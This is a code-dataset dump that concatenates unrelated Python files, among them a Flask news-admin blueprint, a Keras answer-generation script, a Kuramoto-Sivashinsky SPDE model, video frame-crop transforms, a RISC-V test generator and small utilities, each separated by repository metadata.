return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="操作成功")
@admin_blu.route("/news_edit", methods=["GET", "POST"])
def news_edit():
"""返回新闻列表"""
page = request.args.get("p", "1")
print(page)
a = re.match(r"^\d*", page)
b = re.findall(r"""keywords=(\w*)""", page)
print(b)
page = a.group()
if b != []:
b = b[0]
keywords = b
else:
keywords = None
b = ""
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = list()
# 如果有关键词
if keywords:
# 添加关键词的检索选项
filters.append(News.title.contains(keywords))
# 查询
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_basic_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"new_list": news_dict_list,
"last_input": b
}
if request.method == "GET":
return render_template("admin/news_edit.html", data=data)
# return jsonify(errno=RET.OK, errmsg="OK")
return render_template("admin/news_edit.html", data=data)
@admin_blu.route("/news_edit_detail", methods=["GET", "POST"])
def news_edit_detail():
"""新闻编辑详情"""
if request.method == "GET":
# 获取参数
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
# 查询新闻
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
categories = Category.query.all()
categories_li = []
for category in categories:
c_dict = category.to_dict()
c_dict["is_selected"] = False
if category.id == News.category_id:
c_dict["is_selected"] = True
categories_li.append(c_dict)
# 移除最新分类
categories_li.pop(0)
data = {
"news": news.to_dict(),
"categories": categories_li
}
return render_template("admin/news_edit_detail.html", data=data)
news_id = request.form.get("news_id")
title = request.form.get("title")
digest= request.form.get("digest")
content = request.form.get("content")
index_image = request.form.get("index-image")
categery_id = request.form.get("category_id")
# 1.1 判断数据是否有值:
if not all([title, digest, content, categery_id]):
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
print(title, digest, content, categery_id)
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未找到新闻数据")
# 1.2 尝试读取图片
if index_image:
try:
index_image = index_image.read()
except Exception as e:
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
# 2. 将标题图片上传到七牛
try:
key = storage(index_image)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.THIRDERR, errmsg="上传图片错误")
news.index_image_url = constants.QINIU_DOMIN_PREFIX + key
# 3. 设置相关数据
news.title = title
news.digest = digest
news.content = content
news.category_id = categery_id
# 4. 保存到数据库
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
# 5. 返回结果
return jsonify(errno=RET.OK, errmsg="编辑成功")
@admin_blu.route("/news_category")
def get_news_category():
# 获取所有的分类数据
categories = Category.query.all()
# 定义列表保存分类数据
categories_dicts = []
for category in categories:
# 获取字典
cate_dict = category.to_dict()
# 拼接内容
categories_dicts.append(cate_dict)
categories_dicts.pop(0)
# 返回内容
data = {
"categories": categories_dicts
}
return render_template("admin/news_type.html", data=data)
@admin_blu.route("/add_category", methods=["POST"])
def add_category():
"""修改或者添加分类"""
category_id = request.json.get("id")
category_name = request.json.get("name")
print(category_name)
if not category_name:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
# 判断是否有分类id
if category_id:
try:
category = Category.query.get(category_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="查询数据失败")
if not category:
return jsonify(errno=RET.NODATA, errmsg="未查询到分类信息")
category.name = category_name
return jsonify(errno=RET.OK, errmsg="保存数据成功")
else:
# 如果没有分类id, 添加分类
try:
new_category = Category()
new_category.id = category_id
new_category.name = category_name
db.session.add(new_category)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="保存数据成功")
| 2.078125 | 2 |
src/predict_model.py | Swati17293/outlet-prediction | 1 | 4968 | #Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
def load_model():
print('\nLoading model...')
# load json and create model
json_file = open('models/MODEL.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
gate_model = model_from_json(loaded_model_json)
# load weights into new model
gate_model.load_weights('models/MODEL.h5', by_name=True)
return gate_model
train_ans, anslist = [], []
def ans_vec():
anslist = []
dataset = ['Train']
for data in dataset:
f = open('data/raw/' + data + '.csv')
lines = csv.reader(f)
for line in lines:
source_uri = line[4]
anslist.append(source_uri)
f.close()
return anslist
def generate_save_ans():
dic = 3
anslist = ans_vec()
gate_model = load_model()
test_title_feature = np.load('data/vectorized/Test_title.npy')
test_summary_feature = np.load('data/vectorized/Test_summary.npy')
tokenizer_a = text.Tokenizer(num_words=dic+1)
tokenizer_a.fit_on_texts(anslist)
dic_a = tokenizer_a.word_index
ind_a ={value:key for key, value in dic_a.items()}
num_test = len(open('data/raw/Test.csv', 'r').readlines())
ans = gate_model.predict([ test_title_feature, test_summary_feature])
fp = open('reports/Test.ans', 'w')
for h in range(num_test):
i = h
if np.argmax(ans[i][0],axis=0) == 0:
fp.write('indiatimes\n') #Low frequency words are replaced with "indiatimes"
else:
for j in range(dic):
an = np.argmax(ans[i][j],axis=0)
if j != dic-1:
anext = np.argmax(ans[i][j+1],axis=0)
if an != 0 and anext != 0: #Words before and after
if an == anext:
fp.write('') #Delete duplicate words
else:
fp.write(ind_a[an] + ' ')
elif an != 0 and anext == 0:
fp.write(ind_a[an])
elif an == 0 and anext != 0:
fp.write(ind_a[anext])
else:
fp.write('')
else:
if an != 0:
fp.write(ind_a[an] + '\n')
else:
fp.write('\n')
fp.close()
def main():
load_model()
print('\n\nGenerating answers...')
if os.path.exists('reports') == False:
os.mkdir('reports')
if os.path.isfile('reports/Test.ans') == False:
generate_save_ans()
print('\nAnswer generation complete...\n\n')
if __name__ == "__main__":
main() | 2.84375 | 3 |
tools/client.py | Alisa1114/yolov4-pytorch-1 | 0 | 4969 | # -*- coding: UTF-8 -*-
from socket import *
def client():
#實驗室電腦
# serverip='192.168.3.11'
# serverport=8887
#在自己電腦測試
serverip='127.0.0.1'
serverport=8888
client=socket(AF_INET,SOCK_STREAM)
client.connect((serverip,serverport))
address_file = open('tools/address.txt', 'r')
address = address_file.read()
client.send(address.encode())
print(client.recv(1024).decode())
if __name__=='__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = "國立台北大學世界第一:)" | 3.03125 | 3 |
dapy/models/kuramoto_sivashinsky.py | hassaniqbal209/data-assimilation | 11 | 4970 | """Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations.
Acta Astronomica, 4 (1977) pp. 1177–1206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
class FourierLaminarFlameModel(AbstractDiagonalGaussianModel):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its the Fourier coefficients rather
than values of the state field at the spatial mesh points.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
The governing stochastic partial differential equation (SPDE) is
dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW
where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time
coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the
degree of damping in the dynamics, `W(s, t)` a space-time white noise process,
`κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the
spatial coordinate.
Using a spectral spatial discretisation, this corresponds to a non-linear system of
stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ
dX̃ₖ = (ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²) + κ̃ₖ * dW̃ₖ
where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of
the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i`
the imaginary unit.
A Fourier-domain exponential time-differencing integrator with 4th order Runge--
Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic
component of the SDE dynamics and an Euler-Maruyama discretisation used for the
Wiener process increment.
The smoothing kernel Fourier coefficients are assumed to be
κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S)
where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling
the length scale.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations. Acta Astronomica, 4 (1977)
pp. 1177–1206.
3. Kassam, Aly-Khan and Trefethen, <NAME>.
Fourth-order time-stepping for stiff PDEs.
SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233.
4. Cox, <NAME>. and Matthews, <NAME>.
Exponential time differencing for stiff systems.
Journal of Computational Physics 176.2 (2002): 430-455.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
**kwargs
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
assert dim_state % 2 == 0, "State dimension `dim_state` must be even"
self.time_step = time_step
self.observation_space_indices = observation_space_indices
self.observation_function = observation_function
spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent
spatial_freqs_sq = spatial_freqs ** 2
spatial_freqs[dim_state // 2] = 0
state_noise_kernel = (
(time_step) ** 0.5
* state_noise_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
state_noise_std = rfft_coeff_to_real_array(
state_noise_kernel + 1j * state_noise_kernel, False
)
initial_state_kernel = (
initial_state_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
initial_state_std = rfft_coeff_to_real_array(
initial_state_kernel + 1j * initial_state_kernel, False
)
def linear_operator(freqs, freqs_sq):
return freqs_sq - freqs_sq ** 2 - damping_coeff
def nonlinear_operator(v, freqs, freqs_sq):
return (
-0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho")
)
self.integrator = FourierETDRK4Integrator(
linear_operator=linear_operator,
nonlinear_operator=nonlinear_operator,
num_mesh_point=dim_state,
domain_size=domain_extent,
time_step=time_step,
num_roots_of_unity=num_roots_of_unity_etdrk4_integrator,
)
if observation_function is None:
dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0]
else:
dim_observation = observation_function(
np.zeros(dim_state)[observation_space_indices], 0
).shape[0]
super().__init__(
dim_state=dim_state,
dim_observation=dim_observation,
initial_state_std=initial_state_std,
initial_state_mean=np.zeros(dim_state),
state_noise_std=state_noise_std,
observation_noise_std=observation_noise_std,
**kwargs
)
def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray:
return rfft_coeff_to_real_array(
self.integrator.step(real_array_to_rfft_coeff(states))
)
def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray:
subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[
..., self.observation_space_indices
]
if self.observation_function is None:
return subsampled_states
else:
return self.observation_function(subsampled_states, t)
class SpatialLaminarFlameModel(
SpatiallyExtendedModelMixIn,
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
FourierLaminarFlameModel,
):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its values at the spatial mesh points
rather than the corresponding Fourier coefficients. For more details see the
docstring of `FourierLaminarFlameModel`.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
super().__init__(
dim_state=dim_state,
observation_space_indices=observation_space_indices,
observation_function=observation_function,
time_step=time_step,
domain_extent=domain_extent,
damping_coeff=damping_coeff,
observation_noise_std=observation_noise_std,
initial_state_amplitude=initial_state_amplitude,
state_noise_amplitude=state_noise_amplitude,
state_noise_length_scale=state_noise_length_scale,
num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator,
mesh_shape=(dim_state,),
domain_extents=(domain_extent,),
domain_is_periodic=True,
observation_node_indices=observation_space_indices,
)
| 2.015625 | 2 |
setup.py | Lif3line/myo-helper | 0 | 4971 | <filename>setup.py
"""Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
description='Utiltiy functions for working with Myo Armband data',
author='Lif3line',
author_email='<EMAIL>',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 1.296875 | 1 |
demos/restful-users/index.py | karldoenitz/karlooper | 161 | 4972 | # -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
class UsersHandler(Request):
def get(self):
return self.render("/user-page.html")
class UserInfoHandler(Request):
def post(self):
print(self.get_http_request_message())
size = self.get_parameter("user_size", 0)
size = int(size)
user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)]
result = {
"status": 0,
"message": "OK",
"data": user_list
}
return self.response_as_json(result)
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| 2.59375 | 3 |
temporal_transforms.py | LijiangLong/3D-ResNets-PyTorch | 0 | 4973 | import random
import math
class LoopPadding(object):
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalBeginCrop(object):
"""Temporally crop the given frame indices at a beginning.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices[:self.size]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCrop(object):
"""Temporally crop the given frame indices at a center.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
center_index = len(frame_indices) // 2
begin_index = max(0, center_index - (self.size // 2))
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
rand_end = max(0, len(frame_indices) - self.size - 1)
begin_index = random.randint(0, rand_end)
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCropFlexible(object):
def __init__(self, begin=15, step=3, end=108):
self.begin = begin
self.step = step
self.end = end
assert (end - begin) / step + 1 == 32
def __call__(self, frame_indices):
out = frame_indices[slice(self.begin, self.end+1, self.step)]
return out
class TemporalCenterRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
spacing = int((len(frame_indices) - self.size)/2) # i.e. if 120 and 90: = 30
offset = random.randint(-1*int(spacing/2) + 1, int(spacing/2) - 1) # i.e if 120 and 90, -14 to 14
begin_index = int(len(frame_indices)/2) - int(self.size/2) + offset # i.e. 120: 60 - 45 + offset (-1 to 29)
end_index = begin_index + self.size
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out | 3.28125 | 3 |
cli/waiter/subcommands/kill.py | geofft/waiter | 0 | 4974 | from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
| 2.703125 | 3 |
a2t/src/a2t.py | syeda-khurrath/fabric8-analytics-common | 0 | 4975 | <gh_stars>0
"""The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| 2.046875 | 2 |
riscv_ctg/ctg.py | Giri2801/riscv-ctg | 0 | 4976 | # See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
def create_test(usage_str, node,label,base_isa,max_inst):
global op_template
global ramdomize
global out_dir
global xlen
flen = 0
if 'opcode' not in node:
return
if 'ignore' in node:
logger.info("Ignoring :" + str(label))
if node['ignore']:
return
for opcode in node['opcode']:
op_node=None
if opcode not in op_template:
for op,foo in op_template.items():
if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']:
op_node = foo
break
else:
op_node = op_template[opcode]
if op_node is None:
logger.warning("Skipping :" + str(opcode))
return
if xlen not in op_node['xlen']:
logger.warning("Skipping {0} since its not supported in current XLEN:".format(opcode))
return
if 'flen' in op_node:
if '.d' in opcode:
flen = 64
elif '.s' in opcode:
flen = 32
else:
flen = op_node['flen'][0]
#if flen not in op_node['flen']:
# return
fprefix = os.path.join(out_dir,str(label))
logger.info('Generating Test for :' + str(label) +"-" + opcode)
formattype = op_node['formattype']
gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa)
op_comb = gen.opcomb(node)
val_comb = gen.valcomb(node)
instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node))))
logger.info("Writing tests for :"+str(label))
my_dict = gen.reformat_instr(instr_dict)
gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst)
def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate):
global op_template
global randomize
global out_dir
global xlen
logger.level(verbose)
logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ ))
logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')
logger.info('All Rights Reserved.')
logger.info("Copying env folder to Output directory.")
env_dir = os.path.join(out,"env")
if not os.path.exists(env_dir):
shutil.copytree(const.env,env_dir)
xlen = int(xlen_arg)
out_dir = out
randomize = random
mytime = time.asctime(time.gmtime(time.time()) ) + ' GMT'
cgf_argument = ''
for cf in cgf_file:
cgf_argument += '// --cgf {} \\\n'.format(cf)
randomize_argument = ''
if random is True:
randomize_argument = ' \\\n// --randomize'
usage_str = const.usage.safe_substitute(base_isa=base_isa, \
cgf=cgf_argument, version = __version__, time=mytime, \
randomize=randomize_argument,xlen=str(xlen_arg))
op_template = utils.load_yaml(const.template_file)
cgf = expand_cgf(cgf_file,xlen,list_duplicate)
pool = mp.Pool(num_procs)
results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()])
pool.close()
| 1.898438 | 2 |
Back-End/Python/timers/clock_named_tuple.py | ASHISHKUMAR2411/Programming-CookBook | 25 | 4977 | <filename>Back-End/Python/timers/clock_named_tuple.py
from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
def add_time(start, duration, start_weekday=None):
weekdays = [
'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',
'Saturday', 'Sunday'
]
start_time, period = start.split(' ')
def process_time():
current_hour, current_minute = ([int(t) for t in start_time.split(':')])
end_hour, end_minute = ([int(d) for d in duration.split(':')])
# Adds Current time plus End Time Total
end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute)
# Calculates Total days passed
days = int(end_hours/24)
# Calculates New Time
new_time_array = [str(end_hours % 12 + end_mins // 60), ':', str(end_mins % 60).rjust(2, '0')]
new_time_joined = ''.join(new_time_array)
end_period = [period]
# Clock, calculates the days elapsed
clock = end_hours // 12
if start_weekday:
start_day_idx = weekdays.index(start_weekday.title())
new_weekday = weekdays[(start_day_idx + days % 7) % 7]
else:
new_weekday = False
# Figure out whether is AM or PM
for i in range(clock):
if end_period[-1].lower() == 'am':
end_period.append('PM')
else:
end_period.append('AM')
return MainTimer(new_time_joined, end_period, new_weekday, days)
# Triggers process time function
timed = process_time()
def process_output():
new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}'
if timed.new_weekday:
new_time += f'- {timed.new_weekday} -'
if timed.days == 1 and (period != timed.end_period or timed.end_period == 'AM'):
new_time += ' (new_day)'
elif timed.days > 1:
new_time += f' -Total days: {timed.days}- <<'
return new_time
new_time = process_output()
return new_time
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30) | 3.25 | 3 |
mlsurvey/visualize/__init__.py | jlaumonier/mlsurvey | 0 | 4978 | from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| 1.039063 | 1 |
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py | phunc20/dsp | 1 | 4979 | import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| 2.25 | 2 |
setup.py | jerzydziewierz/typobs | 0 | 4980 | <gh_stars>0
# setup.py as described in:
